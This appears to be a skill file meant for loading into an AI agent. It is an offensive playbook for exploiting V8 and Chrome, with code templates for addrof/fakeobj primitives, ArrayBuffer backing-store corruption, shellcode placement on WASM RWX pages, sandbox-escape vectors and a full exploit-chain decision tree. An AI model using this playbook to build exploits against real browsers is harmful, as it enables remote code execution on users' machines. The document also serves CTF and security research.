--- name: browser-exploitation-v8 description: >- Browser and V8 exploitation playbook. Use when exploiting JavaScript engine vulnerabilities including JIT type confusion, incorrect bounds elimination, and V8 sandbox bypass to achieve renderer RCE and sandbox escape in Chrome/Chromium. --- # SKILL: Browser / V8 Exploitation — Expert Attack Playbook > **AI LOAD INSTRUCTION**: Expert V8/Chrome exploitation techniques. Covers V8 compilation pipeline, JIT type confusion, addrof/fakeobj primitives, ArrayBuffer corruption, WASM RWX pages, V8 sandbox (pointer compression), and Chrome sandbox escape overview. Distilled from ctf-wiki browser sections, Project Zero research, and CTF competition patterns. Base models often confuse V8 object representation details and miss the pointer compression barrier. ## 0. RELATED ROUTING - [sandbox-escape-techniques](../sandbox-escape-techniques/SKILL.md) — Chrome renderer sandbox escape via IPC/Mojo - [heap-exploitation](../heap-exploitation/SKILL.md) — general heap concepts applicable to V8 heap - [stack-overflow-and-rop](../stack-overflow-and-rop/SKILL.md) — ROP concepts for native code execution after V8 escape - [binary-protection-bypass](../binary-protection-bypass/SKILL.md) — ASLR/NX bypass in browser context ### Advanced Reference Load [V8_EXPLOITATION_PATTERNS.md](./V8_EXPLOITATION_PATTERNS.md) when you need: - Detailed exploitation patterns and code templates - Heap layout manipulation and GC interaction - V8 sandbox bypass techniques - Object map confusion patterns --- ## 1. V8 ARCHITECTURE ### Compilation Pipeline ``` JavaScript Source ↓ Parser AST (Abstract Syntax Tree) ↓ Ignition Bytecode (interpreted, profiling) ↓ Sparkplug (non-optimizing baseline, V8 ≥ 9.1) Baseline code (fast startup) ↓ Maglev (mid-tier, V8 ≥ 10.2) Mid-optimized code ↓ TurboFan (optimizing JIT) Optimized machine code (with speculative optimizations) ↓ Deoptimization (if speculation fails) Back to Ignition bytecode ``` ### Key V8 Concepts | Concept | Description | |---|---| | Tagged pointers | SMI (Small Integer): `value << 1`, HeapObject: `ptr \| 1` | | Pointer compression | V8 ≥ 8.0: objects addressed via 32-bit offset from cage base (4GB sandbox) | | Maps (Hidden Classes) | Define object shape: property names, types, offsets | | Elements kinds | Internal array type: `PACKED_SMI_ELEMENTS`, `PACKED_DOUBLE_ELEMENTS`, `PACKED_ELEMENTS`, etc. | | Write barrier | GC bookkeeping when heap pointers are written | | Garbage collection | Orinoco GC: minor (Scavenge) and major (Mark-Compact) | ### Object Representation (64-bit, pointer compression) ``` HeapObject in V8 heap (compressed): +0x00: Map pointer (compressed, 32-bit offset) +0x04: Properties/Hash +0x08: Elements pointer (compressed) +0x0C: Length (for arrays) +0x10: Inline properties or backing store data ``` --- ## 2. COMMON V8 BUG CLASSES | Bug Class | Description | Example | |---|---|---| | JIT Type Confusion | TurboFan assumes wrong type after optimization | Speculative type guard eliminated, wrong operation applied | | Incorrect Bounds Elimination | JIT removes array bounds check based on wrong range analysis | `CheckBounds` node eliminated → OOB access | | Prototype Chain Confusion | Optimization assumes stable prototype, mutations invalidate | Prototype change after optimization → wrong property access | | Turbofan Reduction Bug | Incorrect strength reduction or constant folding | Integer overflow in range analysis | | Race Condition | SharedArrayBuffer + worker thread race | Type confusion via concurrent modification | | Off-by-one in Builtin | Boundary error in built-in function implementation | String/Array bounds | | Typer Bug | Incorrect type range computation in TurboFan | `Typer` says value is in [0, N] but can be N+1 | ### Triggering JIT Optimization ```javascript function vuln(arr) { // ... vulnerable code path ... } // Force optimization by calling many times for (let i = 0; i < 100000; i++) { vuln(arr); } // Or use V8 intrinsics (d8 only): %OptimizeFunctionOnNextCall(vuln); vuln(arr); ``` --- ## 3. EXPLOITATION PRIMITIVES ### addrof — Leak Object Address ```javascript // Goal: get the raw heap address of a JavaScript object // Method: type confusion between object array and float array // If we can confuse PACKED_ELEMENTS array with PACKED_DOUBLE_ELEMENTS: // - Write object reference to element of object array // - Read same element as double from confused float array // - Float bits = compressed pointer of the object function addrof(obj) { // Setup depends on specific bug // Typically: trigger type confusion so array reads obj ref as float object_array[0] = obj; return ftoi(confused_float_array[0]); // float-to-int conversion } ``` ### fakeobj — Create Fake Object Reference ```javascript // Goal: create a JS reference to an arbitrary heap address // Method: reverse of addrof — write float (raw pointer bits) to float array, // read from confused object array → treated as object reference function fakeobj(addr) { confused_float_array[0] = itof(addr); // int-to-float conversion return object_array[0]; // now a "pointer" to addr } ``` ### Building Arbitrary R/W from addrof + fakeobj ```javascript // 1. Create a Float64Array with known layout let rw_array = new Float64Array(0x100); let rw_array_addr = addrof(rw_array); // 2. Fake a Float64Array object at controlled address with modified backing_store // 3. Corrupt backing_store pointer to target address // 4. Read/write through the fake Float64Array → arbitrary R/W function read64(addr) { // Set fake array's backing_store = addr write_to_fake_backingstore(addr); return fake_float64array[0]; } function write64(addr, value) { write_to_fake_backingstore(addr); fake_float64array[0] = value; } ``` --- ## 4. OOB READ/WRITE VIA CONFUSED ARRAY BOUNDS When TurboFan incorrectly eliminates bounds checks: ```javascript function trigger(arr, idx) { // TurboFan thinks idx is always < arr.length // But due to bug, idx can exceed bounds return arr[idx]; // OOB read } // OOB read adjacent memory (next heap object's metadata) // OOB write to corrupt next object's map/elements/length ``` ### What's Adjacent in V8 Heap? Objects are allocated sequentially in V8's young generation (new space). By controlling allocation order: ```javascript let arr1 = new Array(0x10); // spray object let arr2 = new Float64Array(0x10); // target: adjacent to arr1 // OOB from arr1 can reach arr2's metadata // Corrupt arr2's length → unconstrained OOB on arr2 ``` --- ## 5. ARRAYBUFFER ARBITRARY R/W `ArrayBuffer`'s backing store is a raw pointer to allocated memory. Corrupting it gives absolute memory R/W. ```javascript let ab = new ArrayBuffer(0x100); let view = new DataView(ab); // If we can overwrite ab's backing_store pointer: // ab.backing_store = target_addr // view.getFloat64(0) → reads 8 bytes from target_addr // view.setFloat64(0, val) → writes to target_addr ``` ### V8 Sandbox (Pointer Compression) Impact Since V8 ≥ 8.0 (pointer compression) and V8 sandbox (≥ 11.x): - `ArrayBuffer.backing_store` is a **sandbox pointer** (within the V8 cage, 4GB region) - Cannot directly point outside the V8 cage - Need sandbox escape to get full process memory access --- ## 6. WASM RWX PAGE WebAssembly JIT code is placed on RWX (Read-Write-Execute) pages on some platforms. ```javascript // Allocate WASM module → JIT compiles to RWX page let wasm_code = new Uint8Array([0x00, 0x61, 0x73, 0x6d, ...]); let mod = new WebAssembly.Module(wasm_code); let instance = new WebAssembly.Instance(mod); // instance.exports.func → points to RWX page // If we can find and write to this page: // 1. addrof(instance) → find WASM instance object // 2. Follow pointers: instance → jump_table_start → RWX page // 3. Use arbitrary write to overwrite RWX page with shellcode // 4. Call instance.exports.func() → executes shellcode ``` **Modern Chrome**: W^X enforcement means WASM pages are either RW or RX, not RWX simultaneously. JIT code is written in RW mode, then switched to RX. Exploitation requires finding a write window or using JIT spray. --- ## 7. V8 SANDBOX ### Architecture (V8 ≥ 11.x) ``` Process Virtual Address Space: ┌──────────────────────────────────────┐ │ V8 Sandbox Cage (4GB region) │ │ ├── V8 Heap (JS objects) │ │ ├── ArrayBuffer backing stores │ │ ├── WASM memory │ │ └── External pointer table │ ├──────────────────────────────────────┤ │ Process memory outside cage │ │ ├── libc, Chrome code │ │ ├── Stack │ │ └── Other allocations │ └──────────────────────────────────────┘ ``` ### Sandbox Escape Vectors | Vector | Method | |---|---| | External pointer table | Corrupt entries in the external pointer table to reference arbitrary addresses | | WASM code pointer | Overwrite WASM function entry to jump to controlled shellcode | | JIT code corruption | Write to JIT code page via race condition or confused pointer | | Mojo IPC (Chrome) | Exploit Chrome IPC to attack browser process from compromised renderer | | Backing store seal bypass | Find type confusion to get unsandboxed pointer | --- ## 8. CHROME SANDBOX ESCAPE (OVERVIEW) After renderer RCE (via V8 exploit), the process is still sandboxed. Full compromise requires: | Stage | Target | Example | |---|---|---| | Renderer exploit | V8 / Blink DOM | Type confusion → shellcode | | IPC/Mojo bug | Chrome IPC layer | Use-after-free in Mojo interface | | Browser process exploit | Privileged browser process | Code execution outside sandbox | Mojo interfaces (Chrome's IPC) expose attack surface: find UAF or type confusion in Mojo message handlers. --- ## 9. TOOLS ```bash # V8 debugging d8 --allow-natives-syntax exploit.js # Enable V8 intrinsics (%DebugPrint, etc.) d8 --trace-turbo exploit.js # Dump TurboFan IR d8 --print-opt-code exploit.js # Print optimized machine code # Turbolizer: visual TurboFan IR graph # Chrome DevTools Memory panel: heap snapshots # Build V8 for debugging git clone https://chromium.googlesource.com/v8/v8.git gclient sync gn gen out/debug --args='is_debug=true v8_enable_sandbox=false' ninja -C out/debug d8 ``` --- ## 10. DECISION TREE ``` V8 vulnerability identified ├── Bug type? │ ├── JIT type confusion → trigger optimization, confuse array element kinds │ ├── Bounds check elimination → OOB read/write on array │ ├── Typer bug → incorrect range leads to OOB │ └── Builtin bug → direct memory corruption primitive │ ├── Build primitives │ ├── Can confuse object array ↔ float array? │ │ └── addrof + fakeobj → arbitrary R/W within V8 heap │ ├── OOB on array? │ │ └── Corrupt adjacent object (length/backing_store) → expand to full R/W │ └── Direct write primitive? │ └── Target WASM instance or ArrayBuffer metadata │ ├── V8 sandbox enabled? │ ├── YES (modern Chrome) → │ │ ├── R/W limited to V8 cage (4GB) │ │ ├── Need sandbox escape: external pointer table corruption, │ │ │ WASM code pointer overwrite, or Mojo bug │ │ └── Then proceed to shellcode execution │ └── NO (older V8, CTF, d8) → │ ├── Corrupt ArrayBuffer backing_store → absolute R/W │ └── Overwrite WASM RWX page → shellcode │ ├── Code execution method │ ├── WASM RWX page available? → write shellcode, call WASM func │ ├── JIT code writable? → overwrite JIT code │ └── ROP needed? → corrupt stack or return address │ └── Full browser exploit chain ├── Stage 1: V8 bug → renderer RCE ├── Stage 2: Mojo IPC bug → browser process compromise └── Stage 3: OS-level escalation (if needed) ```